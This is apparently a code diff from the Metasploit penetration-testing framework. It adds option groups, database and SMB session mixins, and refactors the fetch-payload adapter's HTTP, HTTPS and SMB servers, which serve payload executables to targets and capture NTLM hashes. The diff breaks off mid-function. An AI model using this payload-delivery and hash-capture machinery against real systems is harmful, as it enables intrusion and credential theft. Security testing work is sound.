||||
end
|
||||
|
||||
# De-registers an option group by name
|
||||
#
|
||||
# @param name [String] Name for the group
|
||||
def deregister_option_group(name:)
|
||||
options.remove_group(name)
|
||||
end
|
||||
end
|
||||
|
||||
@@ -295,7 +295,7 @@ class Obj
|
||||
def parse_platform_list(platform_string)
|
||||
return nil if platform_string.nil?
|
||||
|
||||
if platform_string.casecmp('All')
|
||||
if platform_string.casecmp?('All')
|
||||
# empty string represents all platforms in Msf::Module::PlatformList
|
||||
platforms = ['']
|
||||
else
|
||||
|
||||
@@ -3,9 +3,10 @@
|
||||
module Msf
|
||||
module OptCondition
|
||||
# Check a condition's result
|
||||
# @param [Msf::Module] mod The module module
|
||||
# @param [Msf::OptBase] opt the option which has conditions present
|
||||
# @return [String]
|
||||
# @param [String] left_value The left hand side of the condition
|
||||
# @param [String] operator The conditions comparison operator
|
||||
# @param [String] right_value The right hand side of the condition
|
||||
# @return [Boolean]
|
||||
def self.eval_condition(left_value, operator, right_value)
|
||||
case operator.to_sym
|
||||
when :==
|
||||
@@ -16,6 +17,8 @@ module Msf
|
||||
right_value.include?(left_value)
|
||||
when :nin
|
||||
!right_value.include?(left_value)
|
||||
else
|
||||
raise ArgumentError("Operator: #{operator} is invalid")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
@@ -49,6 +49,7 @@ module Msf
|
||||
#
|
||||
def initialize(opts = {})
|
||||
self.sorted = []
|
||||
self.groups = {}
|
||||
|
||||
add_options(opts)
|
||||
end
|
||||
@@ -313,14 +314,33 @@ module Msf
|
||||
result.sort
|
||||
end
|
||||
|
||||
# Adds an option group to the container
|
||||
#
|
||||
# @param option_group [Msf::OptionGroup]
|
||||
def add_group(option_group)
|
||||
groups[option_group.name] = option_group
|
||||
end
|
||||
|
||||
# Removes an option group from the container by name
|
||||
#
|
||||
# @param group_name [String]
|
||||
def remove_group(group_name)
|
||||
groups.delete(group_name)
|
||||
end
|
||||
|
||||
#
|
||||
# The sorted array of options.
|
||||
#
|
||||
attr_reader :sorted
|
||||
|
||||
# @return [Hash<String, Msf::OptionGroup>]
|
||||
attr_reader :groups
|
||||
|
||||
protected
|
||||
|
||||
attr_writer :sorted # :nodoc:
|
||||
|
||||
attr_writer :groups
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
@@ -0,0 +1,32 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Msf
|
||||
class OptionGroup
|
||||
|
||||
# @return [String] Name for the group
|
||||
attr_accessor :name
|
||||
# @return [String] Description to be displayed to the user
|
||||
attr_accessor :description
|
||||
# @return [Array<String>] List of datastore option names
|
||||
attr_accessor :option_names
|
||||
|
||||
# @param name [String] Name for the group
|
||||
# @param description [String] Description to be displayed to the user
|
||||
# @param option_names [Array<String>] List of datastore option names
|
||||
def initialize(name:, description:, option_names: [])
|
||||
self.name = name
|
||||
self.description = description
|
||||
self.option_names = option_names
|
||||
end
|
||||
|
||||
# @param option_name [String] Name of the datastore option to be added to the group
|
||||
def add_option(option_name)
|
||||
@option_names << option_name
|
||||
end
|
||||
|
||||
# @param option_names [Array<String>] List of datastore option names to be added to the group
|
||||
def add_options(option_names)
|
||||
@option_names.concat(option_names)
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -4,50 +4,8 @@
|
||||
|
||||
# A mixin used for providing Modules with post-exploitation options and helper methods
|
||||
#
|
||||
module Msf::OptionalSession
|
||||
include Msf::SessionCompatibility
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(nil, false)
|
||||
]
|
||||
)
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(nil, false)
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::POSTGRESQL_SESSION_TYPE)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::OptString.new('DATABASE', [ false, 'The database to authenticate against', 'postgres']),
|
||||
Msf::OptString.new('USERNAME', [ false, 'The username to authenticate as', 'postgres']),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(nil, false)
|
||||
]
|
||||
)
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless (framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE) || framework.features.enabled?(Msf::FeatureManager::POSTGRESQL_SESSION_TYPE) || framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE))
|
||||
|
||||
super
|
||||
module Msf
|
||||
module OptionalSession
|
||||
include Msf::SessionCompatibility
|
||||
end
|
||||
end
|
||||
|
||||
@@ -0,0 +1,46 @@
|
||||
# frozen_string_literal: true
|
||||
|
||||
module Msf
|
||||
module OptionalSession
|
||||
module MSSQL
|
||||
include Msf::OptionalSession
|
||||
|
||||
RHOST_GROUP_OPTIONS = %w[RHOSTS RPORT DATABASE USERNAME PASSWORD THREADS]
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'SessionTypes' => %w[mssql]
|
||||
)
|
||||
)
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)
|
||||
register_option_group(name: 'SESSION',
|
||||
description: 'Used when connecting via an existing SESSION',
|
||||
option_names: ['SESSION'])
|
||||
register_option_group(name: 'RHOST',
|
||||
description: 'Used when making a new connection via RHOSTS',
|
||||
option_names: RHOST_GROUP_OPTIONS)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::OptString.new('DATABASE', [ false, 'The database to authenticate against', 'MSSQL']),
|
||||
Msf::OptString.new('USERNAME', [ false, 'The username to authenticate as', 'MSSQL']),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(1433, false)
|
||||
]
|
||||
)
|
||||
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)
|
||||
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,44 @@
|
||||
# frozen_string_literal: true
|
||||
|
||||
module Msf
|
||||
module OptionalSession
|
||||
module MySQL
|
||||
include Msf::OptionalSession
|
||||
|
||||
RHOST_GROUP_OPTIONS = %w[RHOSTS RPORT DATABASE USERNAME PASSWORD THREADS]
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'SessionTypes' => %w[mysql]
|
||||
)
|
||||
)
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)
|
||||
register_option_group(name: 'SESSION',
|
||||
description: 'Used when connecting via an existing SESSION',
|
||||
option_names: ['SESSION'])
|
||||
register_option_group(name: 'RHOST',
|
||||
description: 'Used when making a new connection via RHOSTS',
|
||||
option_names: RHOST_GROUP_OPTIONS)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(3306, false)
|
||||
]
|
||||
)
|
||||
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)
|
||||
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,46 @@
|
||||
# frozen_string_literal: true
|
||||
|
||||
module Msf
|
||||
module OptionalSession
|
||||
module PostgreSQL
|
||||
include Msf::OptionalSession
|
||||
|
||||
RHOST_GROUP_OPTIONS = %w[RHOSTS RPORT DATABASE USERNAME PASSWORD THREADS]
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'SessionTypes' => %w[postgresql]
|
||||
)
|
||||
)
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::POSTGRESQL_SESSION_TYPE)
|
||||
register_option_group(name: 'SESSION',
|
||||
description: 'Used when connecting via an existing SESSION',
|
||||
option_names: ['SESSION'])
|
||||
register_option_group(name: 'RHOST',
|
||||
description: 'Used when making a new connection via RHOSTS',
|
||||
option_names: RHOST_GROUP_OPTIONS)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::OptString.new('DATABASE', [ false, 'The database to authenticate against', 'postgres']),
|
||||
Msf::OptString.new('USERNAME', [ false, 'The username to authenticate as', 'postgres']),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(5432, false)
|
||||
]
|
||||
)
|
||||
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless framework.features.enabled?(Msf::FeatureManager::POSTGRESQL_SESSION_TYPE)
|
||||
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,44 @@
|
||||
# frozen_string_literal: true
|
||||
|
||||
module Msf
|
||||
module OptionalSession
|
||||
module SMB
|
||||
include Msf::OptionalSession
|
||||
|
||||
RHOST_GROUP_OPTIONS = %w[RHOSTS RPORT SMBDomain SMBUser SMBPass THREADS]
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'SessionTypes' => %w[smb]
|
||||
)
|
||||
)
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
|
||||
register_option_group(name: 'SESSION',
|
||||
description: 'Used when connecting via an existing SESSION',
|
||||
option_names: ['SESSION'])
|
||||
register_option_group(name: 'RHOST',
|
||||
description: 'Used when making a new connection via RHOSTS',
|
||||
option_names: RHOST_GROUP_OPTIONS)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(445, false)
|
||||
]
|
||||
)
|
||||
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
|
||||
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -5,19 +5,19 @@ module Msf::Payload::Adapter::Fetch
|
||||
register_options(
|
||||
[
|
||||
Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
|
||||
Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces.', Rex::Text.rand_text_alpha(rand(8..12))], regex:/^[\S]*$/),
|
||||
Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: /^[^\s\/\\]*$/),
|
||||
Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
|
||||
Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']),
|
||||
# FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
|
||||
Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
|
||||
Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
|
||||
Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', ''], regex:/^[\S]*$/)
|
||||
Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', ''], regex:/^[\S]*$/)
|
||||
]
|
||||
)
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptAddress.new('FetchListenerBindAddress', [ false, 'The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST']),
|
||||
Msf::OptPort.new('FetchListenerBindPort', [false, 'The port to bind to if different from FETCH_SRVPORT']),
|
||||
Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false]),
|
||||
Msf::OptString.new('FetchServerName', [true, 'Fetch Server Name', 'Apache'])
|
||||
Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false])
|
||||
]
|
||||
)
|
||||
@delete_resource = true
|
||||
@@ -27,7 +27,6 @@ module Msf::Payload::Adapter::Fetch
|
||||
@remote_destination_win = nil
|
||||
@remote_destination_nix = nil
|
||||
@windows = nil
|
||||
|
||||
end
|
||||
|
||||
# If no fetch URL is provided, we generate one based off the underlying payload data
|
||||
@@ -77,9 +76,11 @@ module Msf::Payload::Adapter::Fetch
|
||||
datastore['FetchListenerBindPort'].blank? ? srvport : datastore['FetchListenerBindPort']
|
||||
end
|
||||
|
||||
def fetch_bindnetloc
|
||||
Rex::Socket.to_authority(fetch_bindhost, fetch_bindport)
|
||||
end
|
||||
|
||||
def generate(opts = {})
|
||||
datastore['FETCH_SRVHOST'] = datastore['LHOST'] if datastore['FETCH_SRVHOST'].blank?
|
||||
fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVHOST required') if datastore['FETCH_SRVHOST'].blank?
|
||||
opts[:arch] ||= module_info['AdaptedArch']
|
||||
opts[:code] = super
|
||||
@srvexe = generate_payload_exe(opts)
|
||||
@@ -126,17 +127,14 @@ module Msf::Payload::Adapter::Fetch
|
||||
end
|
||||
|
||||
def srvhost
|
||||
datastore['FETCH_SRVHOST']
|
||||
host = datastore['FETCH_SRVHOST']
|
||||
host = datastore['LHOST'] if host.blank?
|
||||
host = '127.127.127.127' if host.blank?
|
||||
host
|
||||
end
|
||||
|
||||
def srvnetloc
|
||||
netloc = srvhost
|
||||
if Rex::Socket.is_ipv6?(netloc)
|
||||
netloc = "[#{netloc}]:#{srvport}"
|
||||
else
|
||||
netloc = "#{netloc}:#{srvport}"
|
||||
end
|
||||
netloc
|
||||
Rex::Socket.to_authority(srvhost, srvport)
|
||||
end
|
||||
|
||||
def srvport
|
||||
@@ -148,10 +146,6 @@ module Msf::Payload::Adapter::Fetch
|
||||
default_srvuri
|
||||
end
|
||||
|
||||
def srvname
|
||||
datastore['FetchServerName']
|
||||
end
|
||||
|
||||
def windows?
|
||||
return @windows unless @windows.nil?
|
||||
@windows = platform.platforms.first == Msf::Module::Platform::Windows
|
||||
@@ -243,7 +237,6 @@ module Msf::Payload::Adapter::Fetch
|
||||
cmd + _execute_add
|
||||
end
|
||||
|
||||
|
||||
def _generate_ftp_command
|
||||
case fetch_protocol
|
||||
when 'FTP'
|
||||
|
||||
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::HTTP
|
||||
end
|
||||
|
||||
def cleanup_handler
|
||||
cleanup_http_fetch_service(@fetch_service, @delete_resource)
|
||||
if @fetch_service
|
||||
cleanup_http_fetch_service(@fetch_service, @delete_resource)
|
||||
@fetch_service = nil
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
@@ -20,4 +24,3 @@ module Msf::Payload::Adapter::Fetch::HTTP
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::Https
|
||||
end
|
||||
|
||||
def cleanup_handler
|
||||
cleanup_http_fetch_service(@fetch_service, @delete_resource)
|
||||
if @fetch_service
|
||||
cleanup_http_fetch_service(@fetch_service, @delete_resource)
|
||||
@fetch_service = nil
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
@@ -19,4 +23,4 @@ module Msf::Payload::Adapter::Fetch::Https
|
||||
super
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
@@ -1,19 +1,13 @@
|
||||
module Msf::Payload::Adapter::Fetch::Server::HTTP
|
||||
include Msf::Payload::Adapter::Fetch::Server::Https
|
||||
|
||||
# This mixin supports only HTTP fetch handlers but still imports the HTTPS mixin.
|
||||
# We just remove the HTTPS Options so the user does not see them.
|
||||
#
|
||||
# This mixin supports only HTTP fetch handlers.
|
||||
|
||||
def initialize(*args)
|
||||
super
|
||||
deregister_options('FETCH_SSL',
|
||||
'FETCH_CHECK_CERT',
|
||||
'FetchSSLCert',
|
||||
'FetchSSLCompression',
|
||||
'FetchSSLCipher',
|
||||
'FetchSSLCipher',
|
||||
'FetchSSLVersion'
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptString.new('FetchHttpServerName', [true, 'Fetch HTTP server name', 'Apache'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
@@ -21,4 +15,88 @@ module Msf::Payload::Adapter::Fetch::Server::HTTP
|
||||
'HTTP'
|
||||
end
|
||||
|
||||
def srvname
|
||||
datastore['FetchHttpServerName']
|
||||
end
|
||||
|
||||
def add_resource(fetch_service, uri, srvexe)
|
||||
vprint_status("Adding resource #{uri}")
|
||||
if fetch_service.resources.include?(uri)
|
||||
# When we clean up, we need to leave resources alone, because we never added one.
|
||||
@delete_resource = false
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Resource collision detected. Set FETCH_URIPATH to a different value to continue.")
|
||||
end
|
||||
fetch_service.add_resource(uri,
|
||||
'Proc' => proc do |cli, req|
|
||||
on_request_uri(cli, req, srvexe)
|
||||
end,
|
||||
'VirtualDirectory' => true)
|
||||
rescue ::Exception => e
|
||||
# When we clean up, we need to leave resources alone, because we never added one.
|
||||
@delete_resource = false
|
||||
fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n#{e}")
|
||||
end
|
||||
|
||||
def cleanup_http_fetch_service(fetch_service, delete_resource)
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
if fetch_service.resources.include?(escaped_srvuri) && delete_resource
|
||||
fetch_service.remove_resource(escaped_srvuri)
|
||||
end
|
||||
fetch_service.deref
|
||||
end
|
||||
|
||||
def start_http_fetch_handler(srvname, srvexe, ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)
|
||||
# this looks a bit funny because I converted it to use an instance variable so that if we crash in the
|
||||
# middle and don't return a value, we still have the right fetch_service to clean up.
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
fetch_service = start_http_server(ssl, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
|
||||
if fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{fetch_bindnetloc}")
|
||||
end
|
||||
vprint_status("#{fetch_protocol} server started")
|
||||
fetch_service.server_name = srvname
|
||||
add_resource(fetch_service, escaped_srvuri, srvexe)
|
||||
fetch_service
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request, srvexe)
|
||||
client = cli.peerhost
|
||||
vprint_status("Client #{client} requested #{request.uri}")
|
||||
if (user_agent = request.headers['User-Agent'])
|
||||
client += " (#{user_agent})"
|
||||
end
|
||||
vprint_status("Sending payload to #{client}")
|
||||
cli.send_response(payload_response(srvexe))
|
||||
end
|
||||
|
||||
def payload_response(srvexe)
|
||||
res = Rex::Proto::Http::Response.new(200, 'OK', Rex::Proto::Http::DefaultProtocol)
|
||||
res['Content-Type'] = 'text/html'
|
||||
res.body = srvexe.to_s.unpack('C*').pack('C*')
|
||||
res
|
||||
end
|
||||
|
||||
def start_http_server(ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)
|
||||
begin
|
||||
fetch_service = Rex::ServiceManager.start(
|
||||
Rex::Proto::Http::Server,
|
||||
fetch_bindport, fetch_bindhost, ssl,
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
},
|
||||
_determine_server_comm(fetch_bindhost),
|
||||
ssl_cert,
|
||||
ssl_compression,
|
||||
ssl_cipher,
|
||||
ssl_version
|
||||
)
|
||||
rescue Exception => e
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{fetch_bindnetloc}\n#{e}")
|
||||
end
|
||||
vprint_status("Fetch handler listening on #{fetch_bindnetloc}")
|
||||
fetch_service
|
||||
end
|
||||
end
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
module Msf::Payload::Adapter::Fetch::Server::Https
|
||||
include Msf::Payload::Adapter::Fetch::Server::HTTP
|
||||
|
||||
# This mixin supports both HTTP and HTTPS fetch handlers. If you only want
|
||||
# HTTP, use the HTTP mixin that imports this, but removes the HTTPS options
|
||||
@@ -6,13 +7,11 @@ module Msf::Payload::Adapter::Fetch::Server::Https
|
||||
super
|
||||
register_options(
|
||||
[
|
||||
Msf::OptBool.new('FETCH_CHECK_CERT', [true,"Check SSL certificate", false])
|
||||
|
||||
Msf::OptBool.new('FETCH_CHECK_CERT', [true, 'Check SSL certificate', false])
|
||||
]
|
||||
)
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptString.new('FetchHttpServerName', [true, 'Http Server Name', 'Apache']),
|
||||
Msf::OptPath.new('FetchSSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)', '']),
|
||||
Msf::OptBool.new('FetchSSLCompression', [ false, 'Enable SSL/TLS-level compression', false ]),
|
||||
Msf::OptString.new('FetchSSLCipher', [ false, 'String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"']),
|
||||
@@ -23,64 +22,10 @@ module Msf::Payload::Adapter::Fetch::Server::Https
|
||||
)
|
||||
end
|
||||
|
||||
def add_resource(fetch_service, uri, srvexe)
|
||||
vprint_status("Adding resource #{uri}")
|
||||
if fetch_service.resources.include?(uri)
|
||||
# When we clean up, we need to leave resources alone, because we never added one.
|
||||
@delete_resource = false
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Resource collision detected. Set FETCH_URI to a different value to continue.")
|
||||
end
|
||||
fetch_service.add_resource(uri,
|
||||
'Proc' => proc do |cli, req|
|
||||
on_request_uri(cli, req, srvexe)
|
||||
end,
|
||||
'VirtualDirectory' => true)
|
||||
rescue ::Exception => e
|
||||
# When we clean up, we need to leave resources alone, because we never added one.
|
||||
@delete_resource = false
|
||||
fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n #{e}")
|
||||
end
|
||||
|
||||
def cleanup_http_fetch_service(fetch_service, delete_resource)
|
||||
unless fetch_service.nil?
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
if fetch_service.resources.include?(escaped_srvuri) && delete_resource
|
||||
fetch_service.remove_resource(escaped_srvuri)
|
||||
end
|
||||
fetch_service.deref
|
||||
if fetch_service.resources.empty?
|
||||
# if we don't call deref, we cannot start another httpserver
|
||||
# this is a reimplementation of the cleanup_service method
|
||||
# in Exploit::Remote::SocketServer
|
||||
temp_service = fetch_service
|
||||
fetch_service = nil
|
||||
temp_service.cleanup
|
||||
temp_service.deref
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def fetch_protocol
|
||||
'HTTPS'
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request, srvexe)
|
||||
client = cli.peerhost
|
||||
vprint_status("Client #{client} requested #{request.uri}")
|
||||
if (user_agent = request.headers['User-Agent'])
|
||||
client += " (#{user_agent})"
|
||||
end
|
||||
vprint_status("Sending payload to #{client}")
|
||||
cli.send_response(payload_response(srvexe))
|
||||
end
|
||||
|
||||
def payload_response(srvexe)
|
||||
res = Rex::Proto::Http::Response.new(200, 'OK', Rex::Proto::Http::DefaultProtocol)
|
||||
res['Content-Type'] = 'text/html'
|
||||
res.body = srvexe.to_s.unpack('C*').pack('C*')
|
||||
res
|
||||
end
|
||||
|
||||
def ssl_cert
|
||||
datastore['FetchSSLCert']
|
||||
end
|
||||
@@ -97,57 +42,7 @@ module Msf::Payload::Adapter::Fetch::Server::Https
|
||||
datastore['FetchSSLVersion']
|
||||
end
|
||||
|
||||
def start_http_fetch_handler(srvname, srvexe)
|
||||
# this looks a bit funny because I converted it to use an instance variable so that if we crash in the
|
||||
# middle and don't return a value, we still have the right fetch_service to clean up.
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
@fetch_service = start_https_server(false, nil, nil, nil, nil) if @fetch_service.nil?
|
||||
if @fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}")
|
||||
end
|
||||
vprint_status('HTTP server started')
|
||||
@fetch_service.server_name = srvname
|
||||
add_resource(@fetch_service, escaped_srvuri, srvexe)
|
||||
@fetch_service
|
||||
end
|
||||
|
||||
def start_https_fetch_handler(srvname, srvexe)
|
||||
# this looks a bit funny because I converted it to use an instance variable so that if we crash in the
|
||||
# middle and don't return a value, we still have the right fetch_service to clean up.
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
@fetch_service = start_https_server(true, ssl_cert, ssl_compression, ssl_cipher, ssl_version) if @fetch_service.nil?
|
||||
if @fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}\n #{e}")
|
||||
end
|
||||
vprint_status('HTTPS server started')
|
||||
@fetch_service.server_name = srvname
|
||||
add_resource(@fetch_service, escaped_srvuri, srvexe)
|
||||
@fetch_service
|
||||
start_http_fetch_handler(srvname, srvexe, true, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
|
||||
end
|
||||
|
||||
def start_https_server(ssl, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
|
||||
begin
|
||||
fetch_service = Rex::ServiceManager.start(
|
||||
Rex::Proto::Http::Server,
|
||||
fetch_bindport, fetch_bindhost, ssl,
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
},
|
||||
_determine_server_comm(fetch_bindhost),
|
||||
ssl_cert,
|
||||
ssl_compression,
|
||||
ssl_cipher,
|
||||
ssl_version
|
||||
)
|
||||
rescue Exception => e
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}\n #{e}")
|
||||
end
|
||||
vprint_status("Fetch Handler listening on #{fetch_bindhost}:#{fetch_bindport}")
|
||||
fetch_service
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
@@ -0,0 +1,76 @@
|
||||
module Msf::Payload::Adapter::Fetch::Server::SMB
|
||||
|
||||
include ::Msf::Exploit::Remote::SMB::LogAdapter
|
||||
include ::Msf::Exploit::Remote::SMB::Server::HashCapture
|
||||
|
||||
def start_smb_server(srvport, srvhost)
|
||||
vprint_status("Starting SMB server on #{Rex::Socket.to_authority(srvhost, srvport)}")
|
||||
|
||||
log_device = LogDevice::Framework.new(framework)
|
||||
logger = Logger.new(self, log_device)
|
||||
|
||||
ntlm_provider = Msf::Exploit::Remote::SMB::Server::HashCapture::HashCaptureNTLMProvider.new(
|
||||
allow_anonymous: true,
|
||||
allow_guests: true,
|
||||
listener: self,
|
||||
ntlm_type3_status: nil
|
||||
)
|
||||
|
||||
fetch_service = Rex::ServiceManager.start(
|
||||
Rex::Proto::SMB::Server,
|
||||
srvport,
|
||||
srvhost,
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self,
|
||||
},
|
||||
_determine_server_comm(srvhost),
|
||||
gss_provider: ntlm_provider,
|
||||
logger: logger
|
||||
)
|
||||
|
||||
fetch_service.on_client_connect_proc = Proc.new { |client|
|
||||
on_client_connect(client)
|
||||
}
|
||||
fetch_service
|
||||
end
|
||||
|
||||
def cleanup_smb_fetch_service(fetch_service)
|
||||
fetch_service.remove_share(@fetch_virtual_disk)
|
||||
fetch_service.deref
|
||||
end
|
||||
|
||||
def fetch_protocol
|
||||
'SMB'
|
||||
end
|
||||
|
||||
def start_smb_fetch_handler(srvport, srvhost, srvuri, srvexe)
|
||||
unless srvuri.include?('\\')
|
||||
raise RuntimeError, 'The srvuri argument must include a share name'
|
||||
end
|
||||
|
||||
share_name, _, share_path = srvuri.partition('\\')
|
||||
|
||||
fetch_service = start_smb_server(srvport, srvhost)
|
||||
if fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{Rex::Socket.to_authority(srvhost, srvport)}")
|
||||
end
|
||||
|
||||
if fetch_service.shares.key?(share_name)
|
||||
cleanup_smb_fetch_service(fetch_service)
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "The specified SMB share '#{share_name}' already exists.")
|
||||
end
|
||||
|
||||
